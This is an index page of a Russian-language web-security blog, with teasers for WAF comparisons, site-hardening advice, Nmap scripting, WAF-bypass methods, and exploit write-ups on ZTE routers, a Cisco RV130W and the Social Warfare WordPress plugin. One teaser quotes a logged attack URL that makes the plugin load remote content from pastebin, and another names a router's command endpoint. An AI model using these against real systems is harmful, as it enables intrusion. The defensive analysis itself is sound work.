ModSecurity vs Nemesida WAF Free
, , , , ,

В предыдущем обзоре бесплатных WAF для Nginx мы сравнивали NAXSI и Nemesida WAF Free. Теперь настал черед провести еще один, с использованием наиболее популярного решения в своем сегменте — ModSecurity, или Modsec. В обзоре будут учитываться простота установки, качество предустановленных сигнатур (False Positive, False Negative), удобство использования и прочие критерии. Читать далее ModSecurity vs Nemesida WAF Free

Бесплатный аудит веб-приложения на уязвимости

Одна из основных проблем, связанных с компрометацией веб-приложений, является недооцененность как самой атаки, так и ее последствий. Многие думают, что хакеров интересуют только крупные ресурсы вроде Google или Facebook, а условный интернет-магазин стройматериалов или автозапчастей хакеров совершенно не интересует. На самом деле все, что становится доступным в Интернете, может быть атаковано, вне зависимости от типа объекта: почтовый сервер, веб-сайт или IoT.

Вторая проблема — отсутствие информации о защищенности веб-ресурса (вернее, отсутствие информации о наличие уязвимостей). Не каждая компания может себе позволить заказать полноценный анализ защищенности веб-приложения, а многие разработчики игнорируют или просто не знают о лучших практиках безопасной разработки. Это приводит к появлению на сайте уязвимостей, и в конечном итоге — к его компрометации. Инъекции (SQLi, NoSQL, RCE и другие) занимают 1 место в списке OWASP Top 10 и часто являются основной причиной компрометации веб-приложения (персональных данных или другой пользовательской или конфиденциальной информации, заражение других посетителей сайта и т.д.). Читать далее Бесплатный аудит веб-приложения на уязвимости

«Мамкин» безопасник: защита сайта от хакерских атак
, ,

Популярность веб-приложений (к которым относятся сайты, интернет-магазины, личные кабинеты, API и т.д.), большой стек применяемых технологий, дефицит опытных разработчиков, а доступность различного инструментария и знаний в области тестирования на проникновения приводит к ожидаемым последствиям — компрометации веб-приложения. Давайте попробуем повысить его защищенность. Читать далее «Мамкин» безопасник: защита сайта от хакерских атак

ZTE SSL Remote Code Execution
, , , , ,

Я хочу рассказать про уязвимость в ZTE роутерах, доступному по URI router_ip:443/web_shell_cmd.gch. Уязвимость заключается в том, что мы посылаем POST-запрос с ошибкой и ее типом, а в ней — код для выполнения.

Читать далее ZTE SSL Remote Code Execution

Cisco RV130W 1.0.3.44 — Remote Stack Overflow & RCE
,

Разберём свежий эксплойт для переполнения буфера Cisco RV130W версии 1.0.3.44. Переполнение буфера — это явление, возникающее, когда компьютерная программа записывает данные за пределами выделенного в памяти буфера, и как правило, что записывается за пределами буфера называется — shellcode.

Shellcode — код запуска оболочки, это двоичный исполняемый код, который обычно передаёт управление командному процессору, например /bin/sh. Важно знать: один стек равен 4 байтам.

Читать далее Cisco RV130W 1.0.3.44 — Remote Stack Overflow & RCE

NSE или обратная сторона Nmap
, , , , , , , ,

Кролики — это не только ценный мех, но и три — четыре килограмма диетического, легкоусвояемого мяса.

Сегодня мы рассмотрим один из наиболее универсальных инструментов пентестера — Nmap — культовый кроссплатформенный сканер, который расшифровывается как «Network Mapper». Инструмент сам по себе довольно мощный, но его чаще всего используют в связке с другими утилитами, не предполагая, что, помимо способности сканировать сеть, Nmap имеет массу других возможностей. Основная из них — это использование скриптов с помощью NSE (Nmap Scripting Engine) — компонента Nmap, в основе которого лежит скриптовый язык Lua, напоминающий JavaScript. Именно NSE делает Nmap таким универсальным.

Допустим, мы просканировали хост и увидели открытые порты:

Читать далее NSE или обратная сторона Nmap

Сравниваем бесплатные версии WAF: NAXSI vs Nemesida WAF Free
, , , , , , ,

Сегодня мы хотим протестировать и сравнить работу двух бесплатных WAF: NAXSI и Nemesida WAF Free. В сравнении будут учитываться простота использования, качество предустановленных сигнатур, количество пропусков атак и частота ложных срабатываний.

NAXSI расшифровывается как Nginx Anti XSS & SQL Injection. Работает по принципу: всё, что не разрешено — запрещено. Каждый HTTP-запрос (GET|PUT|POST) проверяется на соответствие шаблонам запрещающих правил, заданных по умолчанию в файле naxsi_core.rules. Эти правила охватывают 99% всех возможных вариантов зловредных запросов. Например, по умолчанию запрещены все запросы, в URI которых содержится символ двойной кавычки. Если для нормальной работы приложения такой символ необходим, то вручную нужно внести соответствующие исключения в белый список. Но есть и обратная сторона медали — если разрешающие правила будут проработаны плохо, то NAXSI будет блокировать еще и часть легитимных запросов. Поэтому ответственность за конечный результат разработчики модуля целиком и полностью возлагают на администратора системы. Как и большинство модулей для Nginx, NAXSI из репозитория недоступен, поэтому его придется вручную скачивать и компилировать.

Nemesida WAF Free — бесплатная версия Nemesida WAF, представляющая собой динамический модуль для Nginx и обеспечивающая базовую защиту веб-приложения от атак класса OWASP на основе сигнатурного метода.

Отличительной особенностью Nemesida WAF Free является собственная база сигнатур, выявляющая атаки на веб-приложения при минимальном количестве ложных срабатываний, а также:

  • минимальные требования к аппаратным ресурсам;
  • обновление из репозитория;
  • установка и настройка за несколько минут;
  • обработка содержимого всех типов HTTP-запроса;
  • простота в обслуживании.

Читать далее Сравниваем бесплатные версии WAF: NAXSI vs Nemesida WAF Free

Методы обхода WAF
,

Информация предназначена исключительно для ознакомления. Не нарушайте законодательство.

Web Application Firewall — популярный инструмент для противодействия атакам на веб-приложения. В этой статье я продемонстрирую несколько способов обхода WAF.

Читать далее Методы обхода WAF

Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare
, , ,

Статья носит информационный характер. Не нарушайте законодательство.

Некоторое время назад WAF зафиксировал атаку, которая имела следующий вид:
https://defcon.ru/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf

Из открытых источников мы узнали, что атака представляла собой попытку эксплуатации хранимой XSS уязвимости в Social Warfare — популярном WordpPress-плагине, установленном более чем на 70000 сайтов. Это показалось интересным и мы решили разобраться в уязвимости более детально.

Читать далее Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare